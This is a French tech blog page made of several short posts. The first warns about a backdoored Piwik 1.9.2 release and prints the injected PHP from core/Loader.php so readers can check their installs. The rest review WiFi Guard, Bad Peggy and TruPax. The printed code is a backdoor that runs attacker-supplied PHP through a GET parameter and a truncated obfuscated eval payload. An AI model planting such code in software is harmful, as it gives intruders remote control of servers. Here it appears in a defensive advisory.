Chers amis, attention si vous utilisez Piwik comme outil de stats sur votre serveur. En effet, si vous avez installé ou mis à jour vers la version 1.9.2 du 26 novembre entre 16h43 et 00h59 , il se peut que vous ayez installé une version de Piwik contenant une backdoor. Le pirate a profité d'un bug dans un plugin WordPress présent sur le serveur de Piwik pour placer son code dans les sources du projet.

Pour être certain que votre installation n'est pas piégée, ouvrez le fichier

core/Loader.php

et si vous ne voyez pas ce qui suit dedans, vous êtes tranquille.

<?php Error_Reporting(0);       if(isset($_GET['g']) && isset($_GET['s'])) {
preg_replace("/(.+)/e", $_GET['g'], 'dwm');     exit;
}
if (file_exists(dirname(__FILE__)."/lic.log")) exit;
eval(gzuncompress(base64_decode('eF6Fkl9LwzAUxb+KD0I3EOmabhCkD/
OhLWNOVrF/IlKatiIlnbIOZ/bpzb2pAyXRl7uF/s7JuffmMlrf3y7XD09OSWb
Uo9RzF6XzHCz3+0pOeDW0C79s2vqtaSdOTRKZOxfXDlmJOvp8LbzHwJle
/aIYEL0YWE$

Sinon, rendez-vous sur le blog de Piwik pour comprendre comment vous débarrasser de cette backdoor qui pourrait permettre à un pirate d'avoir accès à votre serveur.

Source

Mouahah ah ah ! Ne loupez plus le FBI ou votre voisin Kévin lorsque ces derniers se connecteront à votre insu sur votre réseau Wifi !

Comment ? Et bien grâce à WiFi Guard, un freeware qui une fois lancé vous prévient lorsqu'un petit nouveau se connecte à votre réseau Wifi.

Pour cela, WiFi Guard est capable de pinger tous les appareils connectés à votre réseau, et même si une machine bloque le ping grâce à son firewall, ce dernier est capable de la détecter quand même. Lors de la première utilisation, vous devrez marquer comme "connues" les machines de votre réseau et laisser ensuite tourner le logiciel. Et lorsqu'une nouvelle adresse MAC fera son apparition, BAM, WiFi Guard vous alertera !

L'outil tourne sous Windows, Linux et Mac OSX et je pense qu'il vous sera rapidement indispensable si vous avez des doutes sur la sécurité de votre réseau et pour attraper les petits malins qui débarquent sur votre routeur sans permission.

Enjoy !

Photo et source

Un nouvel édito où je parle de zéro G, de merci et de LeWeb...

La ZéroG, c'était un truc de ouf. Je vous prépare un article à ce sujet et je me demande ce que vais pouvoir faire d'encore plus mégalo l'année prochaine ;-)

Si vous faites collection d'images JPEG en tout genre, il se peut que sur votre disque dur se trouvent des images qui sont endommagées, illisibles en partie ou totalement corrompues...

Vous aimeriez faire un peu de ménage et les supprimer, mais comment faire sans y passer 3 heures ? Et bien grâce à Bad Peggy, un petit soft java pour Windows et Linux qui scanne le disque dur ou le répertoire de votre choix et qui dresse la liste de toutes les images qui ont un gros souci...

Une fois la liste établie, Bad Peggy vous proposera de les déplacer vers un autre répertoire (pour retrier tout cela manuellement) ou carrément de les supprimer une bonne fois pour toutes.

Très pratique pour gagner encore quelques Mo sur votre disque dur.

Photo

TruPax est un formidable petit logiciel gratuit développé en Java, qui permet de détourner légèrement la philosophie d'utilisation de TrueCrypt. En effet, quand on utilise TrueCrypt de manière classique, on crée un conteneur, qu'on monte et dans lequel on dépose ses fichiers. Cette approche ne convient malheureusement pas à tout le monde.

C'est là qu'entre en scène TruPax qui propose tout simplement de chiffrer avec TrueCrypt, un fichier ou un répertoire, pour en faire un conteneur à part entière, correctement ajusté à la taille des fichiers, utilisant le système de fichier UDF.

TruPax propose aussi de supprimer de manière sécurisée les fichiers originaux afin de ne garder que la copie chiffrée.

Ainsi chiffrés, ces fichiers sont alors plus facilement "transférables" à vos amis et chacun peut le déchiffrer avec TruPax ou directement avec TrueCrypt. Bref, très pratique, surtout qu'un SDK est disponible si vous souhaitez intégrer cette techno dans vos propres applications.

Ça tourne sous Windows et Linux (et probablement sous OSX) et c'est téléchargeable ici (et les sources sont dispo).